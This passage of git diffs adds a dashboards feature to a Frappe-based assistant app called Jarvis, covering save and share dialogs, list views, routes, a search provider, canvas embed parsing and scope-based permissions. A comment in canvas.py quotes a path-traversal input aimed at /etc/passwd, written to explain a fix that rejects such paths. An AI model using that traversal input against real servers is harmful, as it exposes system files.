+
+				<FormControl
+					type="select"
+					label="Who can see it"
+					:options="scopeOptions"
+					:modelValue="form.scope"
+					@update:modelValue="(v) => (form.scope = v)"
+				/>
+				<div v-if="form.scope === 'Role'">
+					<FormControl
+						type="select"
+						label="Role"
+						:options="roleOptions"
+						:modelValue="form.target_role"
+						@update:modelValue="(v) => (form.target_role = v)"
+					/>
+					<ErrorMessage :message="fieldErrors.role" class="mt-1" />
+				</div>
+
+				<!-- read-only detected sources (parsed from the canvas html) -->
+				<div v-if="!shareOnly && sources.length" class="flex flex-col gap-1.5">
+					<span class="text-xs text-ink-gray-5">Data sources</span>
+					<div
+						v-for="s in sources"
+						:key="s.source_name"
+						class="flex items-center justify-between rounded-md border px-2.5 py-1.5"
+					>
+						<span class="truncate text-base text-ink-gray-8">{{ s.source_name }}</span>
+						<Badge :label="s.tool" theme="gray" variant="subtle" />
+					</div>
+				</div>
+
+				<ErrorMessage :message="error" />
+			</div>
+		</template>
+
+		<template #actions>
+			<div class="flex justify-end gap-2">
+				<Button label="Cancel" :disabled="saving" @click="emit('update:modelValue', false)" />
+				<Button variant="solid" :label="saveLabel" :loading="saving" @click="save" />
+			</div>
+		</template>
+	</Dialog>
+</template>
+
+<script setup>
+// SaveDashboardDialog - the builder's save/save-changes form (title,
+// description, visibility scope, read-only detected sources) and, via
+// `shareOnly`, the view page's "Share…" dialog (the same scope section with
+// everything else hidden; the payload re-sends the loaded detail unchanged).
+// Sources come from the parsed #jarvis-sources block (DashboardCanvas emit) -
+// the same list the payload's `sources` key carries.
+import { reactive, ref, computed, watch } from "vue"
+import { Badge, Button, Dialog, ErrorMessage, FormControl } from "frappe-ui"
+import { saveDashboard } from "@/api/dashboards"
+
+const props = defineProps({
+	modelValue: { type: Boolean, default: false },
+	caps: { type: Object, default: () => ({}) },
+	html: { type: String, default: "" },
+	sources: { type: Array, default: () => [] }, // [{source_name, tool, spec}]
+	// existing detail when editing/sharing: {name, dashboard_title, description,
+	// scope, target_role, source_conversation}
+	editing: { type: Object, default: null },
+	conversation: { type: String, default: "" }, // source_conversation for new saves
+	shareOnly: { type: Boolean, default: false },
+})
+
+const emit = defineEmits(["update:modelValue", "saved"])
+
+function errMsg(e) {
+	return (e && ((e.messages && e.messages[0]) || e.message)) || "Something went wrong."
+}
+
+const SCOPE_LABELS = { User: "Private", Role: "Shared with a role", Org: "Everyone" }
+
+const scopeOptions = computed(() =>
+	(props.caps.creatable_scopes || ["User"]).map((s) => ({
+		label: SCOPE_LABELS[s] || s,
+		value: s,
+	}))
+)
+const roleOptions = computed(() => [
+	{ label: "Select a role", value: "" },
+	...(props.caps.manageable_roles || []).map((r) => ({ label: r, value: r })),
+])
+
+const dialogTitle = computed(() =>
+	props.shareOnly ? "Share dashboard" : props.editing ? "Save changes" : "Save dashboard"
+)
+const saveLabel = computed(() =>
+	props.shareOnly ? "Update sharing" : props.editing ? "Save changes" : "Save dashboard"
+)
+
+const form = reactive({ dashboard_title: "", description: "", scope: "User", target_role: "" })
+const saving = ref(false)
+const error = ref("")
+const fieldErrors = reactive({ title: "", role: "" })
+
+// (Re)seed on every open so a reopened dialog never shows stale edits.
+watch(
+	() => props.modelValue,
+	(open) => {
+		if (!open) return
+		error.value = ""
+		fieldErrors.title = ""
+		fieldErrors.role = ""
+		const e = props.editing
+		form.dashboard_title = (e && e.dashboard_title) || ""
+		form.description = (e && e.description) || ""
+		const scopes = props.caps.creatable_scopes || ["User"]
+		form.scope = e && e.scope && scopes.includes(e.scope) ? e.scope : scopes[0] || "User"
+		form.target_role = (e && e.target_role) || ""
+	}
+)
+
+async function save() {
+	fieldErrors.title = ""
+	fieldErrors.role = ""
+	error.value = ""
+	const e = props.editing
+	const title = props.shareOnly ? (e && e.dashboard_title) || "" : form.dashboard_title.trim()
+	if (!title) {
+		fieldErrors.title = "Give the dashboard a title."
+		return
+	}
+	if (form.scope === "Role" && !form.target_role) {
+		fieldErrors.role = "Pick the role to share with."
+		return
+	}
+	// save_dashboard rejects unknown keys, so the payload carries exactly the
+	// documented set; target_role only rides along for Role scope.
+	const payload = {
+		dashboard_title: title,
+		description: props.shareOnly ? (e && e.description) || "" : form.description || "",
+		html: props.html,
+		scope: form.scope,
+		sources: props.sources,
+		source_conversation: (e && e.source_conversation) || props.conversation || "",
+	}
+	if (e && e.name) payload.name = e.name
+	if (form.scope === "Role") payload.target_role = form.target_role
+	saving.value = true
+	try {
+		const detail = await saveDashboard(payload)
+		emit("saved", detail)
+		emit("update:modelValue", false)
+	} catch (err) {
+		error.value = errMsg(err)
+	} finally {
+		saving.value = false
+	}
+}
+</script>

--- a/frontend/src/pages/dashboards/SavedDashboardsTab.vue
+++ b/frontend/src/pages/dashboards/SavedDashboardsTab.vue
@@ -81,11 +81,11 @@ const SCOPE_OPTIONS = [
 	{ label: "Shared with a role", value: "Role" },
 	{ label: "Private", value: "User" },
 ]
-// dashboard_type is derived server-side from the html shape.
+// dashboard_type is derived server-side: sources present -> Connected.
 const TYPE_OPTIONS = [
 	{ label: "All", value: "" },
-	{ label: "Dashboard", value: "Dashboard" },
-	{ label: "Slides", value: "Slides" },
+	{ label: "Static", value: "Static" },
+	{ label: "Connected", value: "Connected" },
 ]
 
 const columns = [

--- a/frontend/src/pages/dashboards/SavedDashboardsTab.vue
+++ b/frontend/src/pages/dashboards/SavedDashboardsTab.vue
@@ -18,11 +18,7 @@
 		:default-sort="DEFAULT_SORT"
 		:get-row-route="getRowRoute"
 		storage-key="dashboards"
-		:empty-state="{
-			icon: 'bar-chart-2',
-			title: 'No dashboards yet',
-			description: 'Build one with chat in the Builder tab, then save it here.',
-		}"
+		:empty-state="emptyState"
 		@update:filters="setFilters"
 		@update:sort="(s) => setSort(s.field, s.dir)"
 		@update:page-length="(v) => (pageLength = v)"
@@ -69,6 +65,7 @@
 // SavedDashboardsTab - the "Saved" tab body on /dashboards#saved: the standard
 // envelope list (MacrosList wiring minus the TabBar/header - the host page
 // owns those). Rows route to the read-only DashboardView page.
+import { computed } from "vue"
 import { Badge, Tooltip } from "frappe-ui"
 import ListPage from "@/components/list/ListPage.vue"
 import { useListPage } from "@/composables/useListPage"
@@ -136,6 +133,25 @@ const {
 	defaultSort: DEFAULT_SORT,
 	storageKey: "dashboards",
 })
+
+// §3.8: when a search/filter is active but matches nothing, the empty state
+// must point at the filters, not read "you have nothing saved".
+const hasActiveFilter = computed(() =>
+	Boolean((filters.search || "").trim() || filters.scope || filters.dashboard_type),
+)
+const emptyState = computed(() =>
+	hasActiveFilter.value
+		? {
+				icon: "search",
+				title: "No matching dashboards",
+				description: "Change your search terms or filters.",
+			}
+		: {
+				icon: "bar-chart-2",
+				title: "No dashboards yet",
+				description: "Build one with chat in the Builder tab, then save it here.",
+			},
+)
 
 function getRowRoute(row) {
 	return { name: "DashboardView", params: { id: row.name } }

--- a/frontend/src/pages/dashboards/SavedDashboardsTab.vue
+++ b/frontend/src/pages/dashboards/SavedDashboardsTab.vue
@@ -1,0 +1,143 @@
+<template>
+	<!-- show-header=false: DashboardsPage owns the single LayoutHeader teleport
+	     (the SkillsPage "exactly one at a time" rule) -->
+	<ListPage
+		:show-header="false"
+		class="min-h-0 flex-1"
+		:columns="columns"
+		:rows="rows"
+		:loading="loading"
+		:total="total"
+		:has-more="hasMore"
+		:quick-filters="quickFilters"
+		:filter-defs="filterDefs"
+		:filters="filters"
+		:sort-options="sortOptions"
+		:sort="sort"
+		:page-length="pageLength"
+		:default-sort="DEFAULT_SORT"
+		:get-row-route="getRowRoute"
+		storage-key="dashboards"
+		:empty-state="{
+			icon: 'bar-chart-2',
+			title: 'No dashboards yet',
+			description: 'Build one with chat in the Builder tab, then save it here.',
+		}"
+		@update:filters="setFilters"
+		@update:sort="(s) => setSort(s.field, s.dir)"
+		@update:page-length="(v) => (pageLength = v)"
+		@load-more="loadMore"
+		@refresh="resetLoad"
+	>
+		<template #cell-dashboard_title="{ row }">
+			<div class="truncate text-base font-medium text-ink-gray-8">
+				{{ row.dashboard_title || row.name }}
+			</div>
+		</template>
+
+		<template #cell-dashboard_type="{ row }">
+			<Badge
+				v-if="row.dashboard_type"
+				variant="subtle"
+				theme="gray"
+				:label="row.dashboard_type"
+			/>
+			<span v-else class="text-base text-ink-gray-4">-</span>
+		</template>
+
+		<template #cell-scope="{ row }">
+			<Badge
+				v-if="row.scope === 'Role'"
+				variant="subtle"
+				theme="blue"
+				:label="row.target_role || 'Role'"
+			/>
+			<Badge v-else-if="row.scope === 'Org'" variant="subtle" theme="blue" label="Everyone" />
+			<Badge v-else variant="subtle" theme="gray" label="Private" />
+		</template>
+
+		<template #cell-modified="{ row }">
+			<Tooltip v-if="row.modified" :text="exactDate(row.modified)">
+				<div class="truncate text-base">{{ timeAgo(row.modified) }}</div>
+			</Tooltip>
+			<span v-else class="text-base text-ink-gray-4">-</span>
+		</template>
+	</ListPage>
+</template>
+
+<script setup>
+// SavedDashboardsTab - the "Saved" tab body on /dashboards#saved: the standard
+// envelope list (MacrosList wiring minus the TabBar/header - the host page
+// owns those). Rows route to the read-only DashboardView page.
+import { Badge, Tooltip } from "frappe-ui"
+import ListPage from "@/components/list/ListPage.vue"
+import { useListPage } from "@/composables/useListPage"
+import { timeAgo, exactDate } from "@/utils/datetime"
+import { listDashboardsPage } from "@/api/dashboards"
+
+const SCOPE_OPTIONS = [
+	{ label: "All", value: "" },
+	{ label: "Everyone", value: "Org" },
+	{ label: "Shared with a role", value: "Role" },
+	{ label: "Private", value: "User" },
+]
+// dashboard_type is derived server-side from the html shape.
+const TYPE_OPTIONS = [
+	{ label: "All", value: "" },
+	{ label: "Dashboard", value: "Dashboard" },
+	{ label: "Slides", value: "Slides" },
+]
+
+const columns = [
+	{ label: "Title", key: "dashboard_title", width: 2 },
+	{ label: "Type", key: "dashboard_type", width: "7rem" },
+	{ label: "Visibility", key: "scope", width: "9rem" },
+	{ label: "Owner", key: "owner", width: "10rem" },
+	{ label: "Updated", key: "modified", width: "8rem" },
+]
+
+// search rides the quick-filter strip (MacrosList idiom): it lives in the
+// filters object for a controlled input, and fetchFn moves it onto the
+// envelope's `search` param (the backend throws on unknown filter keys).
+const quickFilters = [
+	{ key: "search", label: "Search dashboards", type: "text" },
+	{ key: "scope", label: "Visibility", type: "select", options: SCOPE_OPTIONS },
+	{ key: "dashboard_type", label: "Type", type: "select", options: TYPE_OPTIONS },
+]
+const filterDefs = [
+	{ key: "scope", label: "Visibility", type: "select", options: SCOPE_OPTIONS },
+	{ key: "dashboard_type", label: "Type", type: "select", options: TYPE_OPTIONS },
+]
+
+const sortOptions = [
+	{ label: "Updated", value: "modified" },
+	{ label: "Title", value: "dashboard_title" },
+	{ label: "Owner", value: "owner" },
+]
+const DEFAULT_SORT = { field: "modified", dir: "desc" }
+
+const {
+	rows,
+	total,
+	hasMore,
+	loading,
+	filters,
+	setFilters,
+	sort,
+	setSort,
+	pageLength,
+	resetLoad,
+	loadMore,
+} = useListPage({
+	fetchFn: (p) => {
+		const { search: q, ...rest } = p.filters || {}
+		return listDashboardsPage({ ...p, search: q || p.search || "", filters: rest })
+	},
+	defaultSort: DEFAULT_SORT,
+	storageKey: "dashboards",
+})
+
+function getRowRoute(row) {
+	return { name: "DashboardView", params: { id: row.name } }
+}
+</script>

--- a/frontend/src/router/index.js
+++ b/frontend/src/router/index.js
@@ -76,6 +76,20 @@ const routes = [
 		component: () => import("@/pages/triggers/TriggerDetail.vue"),
 		props: true,
 	},
+	// Dashboards: /dashboards is the hash-tabbed builder/saved shell (no hash or
+	// "#builder" = Builder, "#saved" = Saved); /dashboards/:id renders a saved
+	// dashboard read-only.
+	{
+		path: "/dashboards",
+		name: "DashboardsPage",
+		component: () => import("@/pages/dashboards/DashboardsPage.vue"),
+	},
+	{
+		path: "/dashboards/:id",
+		name: "DashboardView",
+		component: () => import("@/pages/dashboards/DashboardView.vue"),
+		props: true,
+	},
 	{ path: "/files", name: "FilesList", component: () => import("@/pages/files/FilesList.vue") },
 	// §15.2: both approval routes render the two-pane board (the :id row is
 	// selected in place); names kept so nav highlighting + router.push targets

--- a/frontend/src/stores/shell.js
+++ b/frontend/src/stores/shell.js
@@ -31,6 +31,7 @@ const settingsOpen = ref(false) // the shell SettingsDialog binds to this
 const settingsSection = ref("general") // active pane key in the settings dialog
 const pendingNewChat = ref(false) // consumed + cleared by ChatView
 const paletteOpen = ref(false)
+const moreMenuOpen = ref(false) // the sidebar "More" destinations palette (MoreMenu.vue)
 
 // Chat-scoped context published by ChatView WHILE MOUNTED (null otherwise), so
 // the shell-level settings panes can read the current conversation's live stats
@@ -300,6 +301,7 @@ const store = reactive({
 	notifyEnabled,
 	pendingNewChat,
 	paletteOpen,
+	moreMenuOpen,
 	sidebarPref,
 	sidebarCollapsed,
 	sidebarWidth,

--- a/frontend/src/views/ChatView.vue
+++ b/frontend/src/views/ChatView.vue
@@ -659,7 +659,7 @@
 					<div class="jv-artifact-body">
 						<iframe v-if="artifact.kind === 'pdf'" :src="artifact.url" class="jv-artifact-frame" title="PDF preview"></iframe>
 						<img v-else-if="artifact.kind === 'image'" :src="artifact.url" class="jv-artifact-img" :alt="artifact.cv.title" />
-						<iframe v-else-if="artifact.kind === 'html' || artifact.kind === 'svg'" :srcdoc="artifact.content" sandbox="allow-scripts allow-popups" class="jv-artifact-frame" title="Artifact preview"></iframe>
+						<iframe v-else-if="artifact.kind === 'html' || artifact.kind === 'svg'" :srcdoc="artifact.content" sandbox="allow-scripts" class="jv-artifact-frame" title="Artifact preview"></iframe>
 						<template v-else-if="artifact.kind === 'table'">
 							<div v-if="artifact.sheets.length > 1" class="jv-sheet-tabs">
 								<button v-for="(sh, si) in artifact.sheets" :key="si" :class="{ on: si === artifact.sheetIdx }" @click="setSheet(si)">{{ sh.name }}</button>

--- a/frontend/src/views/ChatView.vue
+++ b/frontend/src/views/ChatView.vue
@@ -3410,6 +3410,9 @@ function resendFailed(m) {
 	send(txt)
 }
 
+// One-shot viewing context from a "Discuss in chat" hand-off (chatPrefill's
+// optional `context`, e.g. a dashboard): consumed by the first send below.
+let _prefillSendContext = null
 async function send(textArg) {
 	// Don't race an in-flight dictation: sending now would drop the spoken
 	// words (the transcript would land after the message left the composer).
@@ -3463,7 +3466,8 @@ async function send(textArg) {
 		// One-shot wiki grounding: pass the armed flag but only CONSUME it on a
 		// successful send, so a rejected send (and its Retry) keeps grounding armed.
 		const groundWiki = groundNextTurn.value
-		const sendCtx = groundWiki ? { ground_wiki: 1 } : undefined
+		const sendCtx = groundWiki ? { ground_wiki: 1 } : _prefillSendContext || undefined
+		_prefillSendContext = null // one-shot: only the prefill's first send carries it
 		const r = await api.sendMessage(sentFrom, text, undefined, attachments, sendCtx)
 		if (r && r.ok === false) {
 			// The server rejected the send (e.g. the single-flight guard:
@@ -4262,6 +4266,7 @@ onMounted(async () => {
 	// path).
 	if (applyPrefill) {
 		input.value = prefill.text
+		_prefillSendContext = prefill.context || null // rides send()'s context arg
 		await nextTick()
 		autoGrow()
 		if (prefill.autoSend) await send()

--- a/jarvis/chat/api.py
+++ b/jarvis/chat/api.py
@@ -364,6 +364,41 @@ def _search_pages(search: str, limit: int) -> list[dict]:
 	return out
 
 
+def _search_dashboards(search: str, limit: int) -> list[dict]:
+	"""Jarvis Dashboards, fuzzy-matched (subsequence) over their titles.
+	``frappe.get_list`` applies the Jarvis Dashboard query-conditions hook, so
+	the caller only ever sees dashboards their scope allows. Items carry a
+	``spa_route`` (the Jarvis SPA's own /dashboards page), NOT a desk
+	``route`` — there is no desk view for these."""
+	try:
+		rows = frappe.get_list(
+			"Jarvis Dashboard",
+			fields=["name", "dashboard_title", "dashboard_type", "modified"],
+			limit_page_length=0,
+		)
+	except frappe.PermissionError:
+		return []
+	scored = []
+	for r in rows:
+		s = _fuzzy_score(search, r.get("dashboard_title") or "")
+		if s > 0:
+			scored.append((s, r))
+	scored.sort(key=lambda x: x[0], reverse=True)
+	out: list[dict] = []
+	for _s, r in scored[:limit]:
+		nm = r.get("name")
+		out.append(
+			{
+				"name": f"dashboard::{nm}",
+				"label": r.get("dashboard_title") or nm,
+				"icon": "bar-chart-2",
+				"suffix": "Dashboard",
+				"spa_route": f"/dashboards/{quote(str(nm))}",
+			}
+		)
+	return out
+
+
 def _search_records(search: str, limit: int) -> list[dict]:
 	"""Actual document matches via Frappe global search — full-text over
 	``__global_search``. ``frappe.utils.global_search.search`` is already scoped
@@ -403,15 +438,17 @@ def search_workspace(search: str = "", limit: int = 6) -> dict:
 	"""Full desk search over the caller's Frappe desk for the ⌘K palette,
 	delegated entirely to Frappe's own search (no bespoke matcher):
 
-	  * Lists   — matching doctypes,   via ``frappe.desk.search.search_widget``
-	  * Reports — matching reports,    via ``frappe.desk.search.search_widget``
-	  * Pages   — matching desk pages, via ``frappe.desk.search.search_widget``
-	  * Records — matching documents,  via ``frappe.utils.global_search.search``
+	  * Lists      — matching doctypes,   via ``frappe.desk.search.search_widget``
+	  * Reports    — matching reports,    via ``frappe.desk.search.search_widget``
+	  * Pages      — matching desk pages, via ``frappe.desk.search.search_widget``
+	  * Dashboards — matching Jarvis Dashboards (scope-visible), fuzzy title match
+	  * Records    — matching documents,  via ``frappe.utils.global_search.search``
 
-	Each item carries a ready ``/app/...`` desk route. Permission scoping is
-	Frappe's own (see the helpers). Empty search yields no groups; the palette
-	owns chats/nav.
-	Envelope: ``{groups: [{key, title, items: [{name,label,icon,suffix,route}]}]}``.
+	Each item carries a ready ``/app/...`` desk route — except Dashboards,
+	which carry an SPA-internal ``spa_route`` (no desk view exists for them).
+	Permission scoping is Frappe's own (see the helpers). Empty search yields
+	no groups; the palette owns chats/nav.
+	Envelope: ``{groups: [{key, title, items: [{name,label,icon,suffix,route|spa_route}]}]}``.
 	"""
 	search = (search or "").strip()
 	if not search:
@@ -426,6 +463,7 @@ def search_workspace(search: str = "", limit: int = 6) -> dict:
 		("lists", "Lists", _search_lists(search, limit)),
 		("reports", "Reports", _search_reports(search, limit)),
 		("pages", "Pages", _search_pages(search, limit)),
+		("dashboards", "Dashboards", _search_dashboards(search, limit)),
 		("records", "Records", _search_records(search, limit)),
 	):
 		if items:
@@ -959,9 +997,9 @@ def send_message(
 		enqueue_kwargs["attachments"] = atts
 	# Floating-widget auto-context: {doctype, name, label} of the doc the user
 	# is viewing, OR {report_name, filters} when the user is on a
-	# query-report route, OR {page: "triggers"} when the user is on the
-	# Triggers page. Only forwarded when present, for the same
-	# not-yet-reloaded worker safety as attachments above. The narrowing
+	# query-report route, OR {page: "triggers"|"dashboards"} when the user is
+	# on the Triggers / Dashboards page. Only forwarded when present, for the
+	# same not-yet-reloaded worker safety as attachments above. The narrowing
 	# here is deliberate (allow-list, not passthrough) so a compromised /
 	# stale frontend can't smuggle arbitrary keys into the worker payload;
 	# every key the prompt-side actually consumes must be listed here.
@@ -970,12 +1008,12 @@ def send_message(
 			ctx = frappe.parse_json(context)
 			# ``ground_wiki`` is the composer's one-shot "ground this turn on the
 			# wiki" flag; it can arrive with no viewing-context doc, so forward the
-			# context payload when EITHER a doc/report ref OR ground_wiki OR the
-			# Triggers-page marker is set.
+			# context payload when EITHER a doc/report ref OR ground_wiki OR a
+			# page marker is set.
 			ground_wiki = 1 if (isinstance(ctx, dict) and frappe.utils.cint(ctx.get("ground_wiki"))) else 0
 			if isinstance(ctx, dict) and (
 				ctx.get("doctype") or ctx.get("report_name") or ground_wiki
-				or ctx.get("page") == "triggers"
+				or ctx.get("page") in ("triggers", "dashboards")
 			):
 				enqueue_kwargs["context"] = {
 					"doctype": ctx.get("doctype") or "",
@@ -989,10 +1027,11 @@ def send_message(
 					# One-shot wiki grounding (allow-listed, boolean only).
 					"ground_wiki": ground_wiki,
 				}
-				# `page` is a literal allow-list of one value (not a
-				# passthrough) — the prompt-side only consumes "triggers".
-				if ctx.get("page") == "triggers":
-					enqueue_kwargs["context"]["page"] = "triggers"
+				# `page` is a literal allow-list of two values (not a
+				# passthrough) — the prompt-side only consumes "triggers"
+				# and "dashboards".
+				if ctx.get("page") in ("triggers", "dashboards"):
+					enqueue_kwargs["context"]["page"] = ctx["page"]
 				# Persist the viewing-context doc ref on the user message row
 				# so post-turn entity extraction (jarvis.chat.entities) sees
 				# what the user was looking at, not just what tools touched.

--- a/jarvis/chat/api.py
+++ b/jarvis/chat/api.py
@@ -374,7 +374,10 @@ def _search_dashboards(search: str, limit: int) -> list[dict]:
 		rows = frappe.get_list(
 			"Jarvis Dashboard",
 			fields=["name", "dashboard_title", "dashboard_type", "modified"],
-			limit_page_length=0,
+			order_by="modified desc",
+			# Bounded scan: the palette fires this per keystroke. Fuzzy-rank the
+			# most-recent few hundred rather than every dashboard ever created.
+			limit_page_length=500,
 		)
 	except frappe.PermissionError:
 		return []

--- a/jarvis/chat/api.py
+++ b/jarvis/chat/api.py
@@ -1032,6 +1032,12 @@ def send_message(
 				# and "dashboards".
 				if ctx.get("page") in ("triggers", "dashboards"):
 					enqueue_kwargs["context"]["page"] = ctx["page"]
+					# Dashboards builder's explicit data-mode toggle: the user
+					# declared whether they want a baked one-time report or a
+					# live data-connected one. Two literal values; absent =
+					# let the agent decide from the ask.
+					if ctx["page"] == "dashboards" and ctx.get("data_mode") in ("static", "live"):
+						enqueue_kwargs["context"]["data_mode"] = ctx["data_mode"]
 				# Persist the viewing-context doc ref on the user message row
 				# so post-turn entity extraction (jarvis.chat.entities) sees
 				# what the user was looking at, not just what tools touched.

--- a/jarvis/chat/canvas.py
+++ b/jarvis/chat/canvas.py
@@ -52,18 +52,36 @@ _CANVAS_LINK = re.compile(
 )
 _CANVAS_BARE = re.compile(rf"\S*?canvas/{_PATH}\.(?:{_EXTS})(?![\w])", re.IGNORECASE)
 
+# openclaw 2026.6+ "hosted embed" markers. The runtime's own system prompt
+# teaches the model to publish rich HTML as a hosted canvas document and
+# reference it with ``[embed ref="<id>" title="..." /]`` (or an explicit
+# ``[embed url="/__openclaw__/canvas/..." /]``). The gateway serves ref
+# documents at ``canvas/documents/<id>/index.html``, so refs fold into the
+# same fetch/persist path as plain canvas file references.
+_EMBED_MARKER = re.compile(r"\[embed\s[^\]]*\]", re.IGNORECASE)
+_EMBED_REF = re.compile(
+	r"\[embed\s[^\]]*?\bref=[\"']([\w.\-]+)[\"'][^\]]*\]", re.IGNORECASE
+)
+
+
+def _embed_ref_name(ref: str) -> str:
+	return f"documents/{ref}/index.html"
+
 
 def detect_canvas_names(text: str) -> list[str]:
 	"""Return canvas artifact paths referenced in ``text``, de-duplicated, in order.
 
 	Paths keep their subdir (e.g. ``charts/sales.html``) so the gateway fetch
-	hits the right URL.
+	hits the right URL. Hosted-embed refs are mapped to their gateway document
+	path (``documents/<id>/index.html``).
 	"""
 	if not text:
 		return []
 	seen: dict[str, None] = {}
 	for m in _CANVAS_REF.finditer(text):
 		seen.setdefault(m.group(1), None)
+	for m in _EMBED_REF.finditer(text):
+		seen.setdefault(_embed_ref_name(m.group(1)), None)
 	return list(seen)[:_MAX_CANVAS_PER_TURN]
 
 
@@ -132,7 +150,21 @@ def strip_canvas_refs(content: str, names: list[str]) -> str:
 	the user sees clean text + the rendered artifact, not a broken file link."""
 	if not content or not names:
 		return content
-	out = _CANVAS_LINK.sub("", content)
+
+	# Hosted-embed markers first (before the bare-path strip mangles a
+	# url= form into marker residue): drop any [embed ...] whose ref or
+	# embedded canvas url resolved to a persisted artifact.
+	def _drop_embed(m: re.Match) -> str:
+		marker = m.group(0)
+		ref = _EMBED_REF.match(marker)
+		if ref and _embed_ref_name(ref.group(1)) in names:
+			return ""
+		if any(n in marker for n in names):
+			return ""
+		return marker
+
+	out = _EMBED_MARKER.sub(_drop_embed, content)
+	out = _CANVAS_LINK.sub("", out)
 	out = _CANVAS_BARE.sub("", out)
 	out = re.sub(r"[ \t]+([.,;:])", r"\1", out)
 	out = re.sub(r"\n{3,}", "\n\n", out)

--- a/jarvis/chat/canvas.py
+++ b/jarvis/chat/canvas.py
@@ -68,6 +68,20 @@ def _embed_ref_name(ref: str) -> str:
 	return f"documents/{ref}/index.html"
 
 
+# The canvas host appends its own client script to hosted documents (a
+# live-reload WebSocket + user-action channel on /__openclaw__/ws). Inside
+# the Jarvis sandbox that channel cannot exist — the iframe CSP blocks all
+# egress — so the script is dead weight that logs a CSP violation on every
+# render. Drop any script block that references the host socket.
+_SCRIPT_BLOCK = re.compile(r"<script\b.*?</script>", re.IGNORECASE | re.DOTALL)
+
+
+def _strip_host_client(text: str) -> str:
+	return _SCRIPT_BLOCK.sub(
+		lambda m: "" if "__openclaw__/ws" in m.group(0) else m.group(0), text
+	)
+
+
 def detect_canvas_names(text: str) -> list[str]:
 	"""Return canvas artifact paths referenced in ``text``, de-duplicated, in order.
 
@@ -190,6 +204,11 @@ def persist_canvases(
 		if not fetched:
 			continue
 		body, typ = fetched
+		if typ == "html" and name.startswith("documents/"):
+			try:
+				body = _strip_host_client(body.decode("utf-8")).encode("utf-8")
+			except Exception:
+				pass
 		try:
 			file_url = _save_file(assistant_msg_name, name, body)
 		except Exception:

--- a/jarvis/chat/canvas.py
+++ b/jarvis/chat/canvas.py
@@ -93,7 +93,13 @@ def detect_canvas_names(text: str) -> list[str]:
 		return []
 	seen: dict[str, None] = {}
 	for m in _CANVAS_REF.finditer(text):
-		seen.setdefault(m.group(1), None)
+		name = m.group(1)
+		# Reject path traversal: `_PATH` permits `..` segments, so a reply of
+		# `canvas/../../etc/passwd.html` would otherwise be fetched from the
+		# gateway with the bearer token. Only in-tree canvas paths are allowed.
+		if ".." in name.split("/"):
+			continue
+		seen.setdefault(name, None)
 	for m in _EMBED_REF.finditer(text):
 		seen.setdefault(_embed_ref_name(m.group(1)), None)
 	return list(seen)[:_MAX_CANVAS_PER_TURN]

--- a/jarvis/chat/dashboard_permissions.py
+++ b/jarvis/chat/dashboard_permissions.py
@@ -1,0 +1,162 @@
+"""Scope visibility + write matrix for ``Jarvis Dashboard``.
+
+The data-layer twin of ``jarvis/chat/wiki_permissions.py``, registered in
+hooks.py via ``permission_query_conditions`` / ``has_permission``.
+
+Visibility (read) — enforced everywhere (Desk lists via the query-conditions
+hook, per-doc access via the has_permission hook, SPA raw-SQL lists via
+``visible_scope_condition``):
+
+  * Org dashboards: every jarvis user.
+  * Role dashboards: users holding ``target_role`` (+ the admin tier).
+  * User dashboards: ``target_user`` only (+ the admin tier).
+  * Blank/NULL scope is PRIVATE (treated like User via ``target_user``, NOT
+    Org — the opposite of the wiki's blank-scope default: a dashboard that
+    somehow lost its scope must fail closed, not org-wide).
+  * The OWNER always reads their own dashboard regardless of scope.
+
+Write matrix: the owner, or the admin tier (System Manager / Jarvis Admin).
+Delete follows write. The doctype permission rows grant Jarvis User r/w/c/d
+broadly and this hook DENIES non-owner writes — the "grant + deny-hook" shape
+used by Jarvis Trigger. The scope-widening gate (plain users may not create
+Org/Role dashboards) lives in the DocType controller, NOT here: "create"
+reaches the hook without a doc, so it could never inspect the scope.
+
+NOTE on the has_permission hook: on this Frappe version controller hooks can
+only DENY — any falsy return (None included) denies, so this module returns
+an explicit True to defer to the normal role-perm check.
+"""
+
+from __future__ import annotations
+
+import frappe
+
+from jarvis.chat.wiki_permissions import _NON_TARGETABLE_ROLES
+from jarvis.permissions import JARVIS_ADMIN_ROLE, has_jarvis_admin_access
+
+DASHBOARD = "Jarvis Dashboard"
+
+# ptypes that reveal dashboard content; everything read-shaped maps to
+# visibility (mirrors wiki_permissions).
+_READ_PTYPES = ("read", "select", "print", "email", "export", "share", "report")
+
+
+def _is_sm(user: str) -> bool:
+	# Administrator's get_roles returns every Role, so the explicit check is
+	# just a shortcut; both spellings of "full access" land here.
+	return user == "Administrator" or "System Manager" in frappe.get_roles(user)
+
+
+def _get(doc, field: str):
+	# dict rows (frappe.get_all) and Document both expose .get.
+	return doc.get(field)
+
+
+def can_read_dashboard(doc, user: str | None = None) -> bool:
+	"""Visibility matrix for one dashboard (dict with owner/scope/target_*
+	fields, or a Document)."""
+	user = user or frappe.session.user
+	if has_jarvis_admin_access(user):
+		return True
+	if (_get(doc, "owner") or "") == user:
+		return True
+	scope = (_get(doc, "scope") or "").strip()
+	if scope == "Org":
+		return True
+	if scope == "Role":
+		target_role = _get(doc, "target_role")
+		return bool(target_role) and target_role in frappe.get_roles(user)
+	# "User" — and blank/None scope, which is PRIVATE (fail closed, not Org).
+	return (_get(doc, "target_user") or "") == user
+
+
+def can_edit_dashboard(doc, user: str | None = None) -> bool:
+	"""Write matrix: the owner, or the admin tier."""
+	user = user or frappe.session.user
+	if has_jarvis_admin_access(user):
+		return True
+	return (_get(doc, "owner") or "") == user
+
+
+def creatable_scopes(user: str | None = None) -> list[str]:
+	"""Scopes this user may create dashboards in. Personal dashboards for
+	everyone; sharing (Org/Role) is the admin tier's call."""
+	user = user or frappe.session.user
+	if has_jarvis_admin_access(user):
+		return ["Org", "Role", "User"]
+	return ["User"]
+
+
+def manageable_roles(user: str | None = None) -> list[str]:
+	"""Roles the user may target for Role-scope dashboards: SM targets any
+	enabled desk role; a Jarvis Admin targets roles they hold. The wiki's
+	non-targetable set (framework/blanket roles) is excluded in both cases —
+	targeting e.g. "Desk User" would be an org-wide side door."""
+	user = user or frappe.session.user
+	if _is_sm(user):
+		return [
+			r
+			for r in frappe.get_all(
+				"Role",
+				filters={"disabled": 0, "desk_access": 1},
+				order_by="name asc",
+				pluck="name",
+			)
+			if r not in _NON_TARGETABLE_ROLES
+		]
+	roles = set(frappe.get_roles(user))
+	if JARVIS_ADMIN_ROLE not in roles:
+		return []
+	return sorted(roles - set(_NON_TARGETABLE_ROLES))
+
+
+def visible_scope_condition(user: str | None = None) -> str:
+	"""SQL boolean fragment over ``tabJarvis Dashboard`` implementing the
